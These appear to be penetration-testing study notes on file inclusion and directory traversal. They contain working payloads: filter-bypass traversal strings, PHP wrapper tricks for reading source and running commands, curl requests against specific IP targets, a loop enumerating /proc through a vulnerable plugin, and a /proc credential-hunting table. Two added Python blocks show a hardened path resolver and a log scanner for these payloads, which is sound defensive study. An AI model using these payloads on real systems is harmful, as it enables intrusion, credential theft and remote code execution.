File Inclusion / Directory Traversal

Hacktricks

PayloadAllTheThings

Blog: The Proc File System

Tool: secondtool

LFI

 file:///../../../etc/passwd
 /etc/passwd on Linux or C:\Windows\boot.ini on Windows
 # if input from parameters is used as part of filenames,
 # we can bypass by adding /../ in the

 # if blacklisting is not coded correctly (e.g. ../ is removed in a single pass)
 ..././ and ....// would become ../ and vice versa
 cat .?/.*/.?/etc/passwd
 # Bash allows the ? and * wildcards to stand in for characters of the path

 # On PHP versions 5.3.4 and earlier, string-based detection could be bypassed by URL encoding the payload.
 # The characters ../ can be URL encoded into %2e%2e%2f, which will bypass the filter.
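The two filter styles above side by side, as an added example that is not part of the original notes: `naive_sanitize` is the single-pass blacklist that the `..././` and `....//` forms defeat, and `safe_resolve` is the hardened alternative (decode, refuse stream wrappers, canonicalise with `realpath`, then check containment). `BASE_DIR` is a constructed document root and both function names are hypothetical.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Hypothetical document root for the demonstration (constructed, not from the page).
BASE_DIR = os.path.realpath("/var/www/app/pages")


def naive_sanitize(user_path: str) -> str:
    """Blacklist filter that strips '../' in a single pass.

    This is the weak filter the notes describe: because the replacement is
    not repeated, '..././' and '....//' collapse back into '../'.
    """
    return user_path.replace("../", "")


def safe_resolve(user_path: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Resolve a user-supplied relative path inside base_dir, or return None.

    Instead of blacklisting strings, this decodes the input, refuses stream
    wrappers and NUL bytes, canonicalises the result with realpath (which also
    follows symlinks), and finally checks that the path is still under base_dir.
    """
    decoded = unquote(user_path)          # %2e%2e%2f becomes ../
    if "://" in decoded or "\x00" in decoded:
        return None                       # php://, file://, expect:// and friends
    candidate = os.path.realpath(os.path.join(base_dir, decoded))
    # commonpath is the containment test: anything that climbed out of
    # base_dir (via ../, ..././, or a symlink) no longer shares its prefix.
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None
    return candidate


if __name__ == "__main__":
    for probe in ["index.php", "../../../../etc/passwd",
                  "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
                  "....//....//....//....//etc/passwd",
                  "php://filter/read=convert.base64-encode/resource=config"]:
        print(f"{probe!r:60} naive={naive_sanitize(probe)!r} safe={safe_resolve(probe)!r}")
```

The point of the containment check is that it does not care how the traversal was spelled: whatever survives decoding and canonicalisation either sits under the document root or it does not, so there is no string pattern left to bypass.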

PHP provides various wrappers, which can be used for easier access to files, protocols, or streams. A list of wrappers can be found here. The php:// wrapper is enabled by default and interacts with IO streams.

PHP filter to convert file contents to Base64

 php://filter/read=convert.base64-encode/resource=/etc/passwd
 # returns the target's PHP source as Base64, which we can decode locally
 curl http://134.209.184.216:32391/extension/index.php?language=php://filter/read=convert.base64-encode/resource=config

PHP filter to convert file contents to ROT13

php://filter/read=string.rot13/resource=/etc/passwd

Command execution with PHP Expect wrapper

expect://id

Using PHP Input wrapper for command execution

curl -s -X POST --data "<?php system('id'); ?>" "http://134.209.184.216:30084/index.php?language=php://input"

Command execution with the PHP Zip wrapper

zip://malicious.zip%23exec.php&cmd=id

The Proc File System

$ for i in `seq 1 10000`; do curl -s --output - http://$RHOST/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline | grep -oaE 'cmdline.*?<script>' | sed "s/cmdline\/proc\/$i\/cmdline\/proc\/$i\/cmdline//" | sed "s/<script>//" | grep -avE '^$'; done
Directory / Description

/proc/sched_debug

This is usually enabled on newer systems, such as RHEL 6. It provides information as to what process is running on which cpu. This can be handy to get a list of processes and their PID number.

/proc/mounts

Provides a list of mounted file systems. Can be used to determine where other interesting files might be located.

/proc/net/arp

Shows the ARP table. This is one way to find out IP addresses for other internal servers.

/proc/net/route

Shows the routing table information.

/proc/net/tcp and /proc/net/udp

Provides a list of active connections. Can be used to determine which ports are listening on the server.

/proc/net/fib_trie

This is used for route caching. It can also be used to determine local IPs, as well as to gain a better understanding of the target's networking structure.

/proc/version

Shows the kernel version. This can be used to help determine the OS running and the last time it’s been fully updated.

Directory / Description

/proc/[PID]/cmdline

Lists everything that was used to invoke the process. This sometimes contains useful paths to configuration files as well as usernames and passwords.

/proc/[PID]/environ

Lists all the environment variables that were set when the process was invoked. This also sometimes contains useful paths to configuration files as well as usernames and passwords.

/proc/[PID]/cwd

Points to the current working directory of the process. This may be useful if you don’t know the absolute path to a configuration file.

/proc/[PID]/fd/[#]

Provides access to the file descriptors being used. In some cases this can be used to read files that are opened by a process.
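From the detection side, the wrapper payloads (php://filter, php://input, expect://, zip://) and the /proc reads from the two tables above all arrive in the request target, so they are visible in ordinary web-server access logs. The following is an added example, not part of the original notes, of scanning combined-format log lines for those indicators after URL decoding. The log lines, IPs and timestamps are constructed for the demonstration; the indicator names and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for the demonstration (not from the page).
# The IPs, timestamps and paths are invented; the parameter values mirror the
# payload shapes the notes describe.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET /index.php?language=en HTTP/1.1" 200 512
10.0.0.9 - - [12/May/2024:10:01:07 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 1488
10.0.0.9 - - [12/May/2024:10:01:09 +0000] "POST /index.php?language=php://input HTTP/1.1" 200 77
10.0.0.9 - - [12/May/2024:10:01:12 +0000] "GET /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1" 200 1301
10.0.0.9 - - [12/May/2024:10:01:15 +0000] "GET /filedownload.php?ebookdownloadurl=/proc/self/environ HTTP/1.1" 200 2210
10.0.0.7 - - [12/May/2024:10:02:00 +0000] "GET /index.php?language=fr HTTP/1.1" 200 512
"""

# Pulls the method and request target out of a combined-log-format line
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Indicator patterns, each matching a technique listed in the notes
WRAPPER_RE = re.compile(r"\b(php|expect|zip|file)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")   # also matches the ../ inside ..././ and ....//
PROC_RE = re.compile(r"/proc/", re.IGNORECASE)


def classify_target(target: str) -> list:
    """Return the indicator names found in one request target."""
    # Decode twice so a double-encoded %252e%252e%252f is also seen as ../
    decoded = unquote(unquote(target))
    hits = []
    if WRAPPER_RE.search(decoded):
        hits.append("stream-wrapper")
    if TRAVERSAL_RE.search(decoded):
        hits.append("traversal")
    if PROC_RE.search(decoded):
        hits.append("procfs-read")
    return hits


def scan_log(text: str) -> list:
    """Return (client_ip, method, target, indicators) for each suspicious line."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = classify_target(match.group("target"))
        if hits:
            client_ip = line.split(" ", 1)[0]
            findings.append((client_ip, match.group("method"),
                             match.group("target"), hits))
    return findings


if __name__ == "__main__":
    for client_ip, method, target, hits in scan_log(SAMPLE_LOG):
        print(f"{client_ip} {method} {target} -> {', '.join(hits)}")
```

Decoding before matching is what makes this useful: a rule that looks for the literal string `../` misses `%2e%2e%2f` exactly as the PHP filter in the notes did, and a single client emitting several of these indicators in a short window is the pattern worth alerting on rather than any one line.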
